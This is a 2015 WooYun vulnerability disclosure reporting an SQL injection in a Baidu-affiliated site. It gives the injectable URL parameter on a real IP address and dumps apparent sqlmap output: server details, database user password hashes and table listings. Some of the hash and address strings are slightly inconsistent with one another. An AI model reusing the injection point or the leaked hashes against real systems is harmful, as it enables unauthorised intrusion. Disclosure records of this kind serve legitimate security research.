当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125580

漏洞标题:百度旗下某业务子站SQL注入漏洞

相关厂商:百度

漏洞作者: xy小雨

提交时间:2015-07-09 11:12

修复时间:2015-08-23 14:20

公开时间:2015-08-23 14:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

一天小姨子来我家,刚好家里买了点香蕉,便问她要不要,小姨子说,不用不用。我:给你吃的,不是给你用的!顿时家里安静了...

详细说明:

http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1%27 路径

Target: 		http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1
Host IP:		42.62.39.206
Web Server: 	Apache
Powered-by: 	PHP/5.2.6
DB Server: 	MySQL time based
Resp. Time(avg):	275 ms
Current User: 	wap@11.11.0.125
Sql Version: 	5.1.73-log
Current DB: 	baikan
System User: 	wap@11.11.0.120
Host Name: 	localhost.localdomain
Installation dir: 	/usr/local/mysql/
DB User & Pass: 	root::localhost
		root::localhost.localdomain
		root::127.0.0.1
		::localhost
		::localhost.localdomain
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.165
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.166
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.167
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.168
		wap:*47F5587D14973816A255AB6698096D0D1DDBE6AD:118.144.95.169
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:localhost
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.152
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.128
		wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:11.11.0.129
		wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:1/.11.0.130
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBA6AD:11.11.0.131
		wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.132
Data Bases: 	information_schema
		baikan
		mysql
		test


Database: test
[1 table]
+---------------------------------------+
| te                                    |
+---------------------------------------+
Database: baikan
[21 tables]
+---------------------------------------+
| admin_user                            |
| baikan_psort                          |
| baikan_saomiao_block_log              |
| baikan_saomiao_keyword_log            |
| baikan_sort                           |
| channel_bookorder_duoku               |
| channel_bookorder_duokubak            |
| cmread_book_info                      |
| global_level                          |
| wap_advertisement                     |
| wap_advertposition                    |
| wap_block                             |
| wap_blockbooks                        |
| wap_blockchildren                     |
| wap_cooperater                        |
| wap_cpbooks                           |
| wap_feedback                          |
| wap_keyword                           |
| wap_keywordposition                   |
| wap_page                              |
| wap_page_block                        |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user                                  |
| columns_priv                          |
| db                                    |
| event                                 |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| ndb_binlog_index                      |
| plugin                                |
| proc                                  |
| procs_priv                            |
| servers                               |
| slow_log                              |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
+---------------------------------------+

漏洞证明:

1.jpg


2.jpg

修复方案:

过滤

版权声明:转载请注明来源 xy小雨@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-09 14:19

厂商回复:

感谢

最新状态:

暂无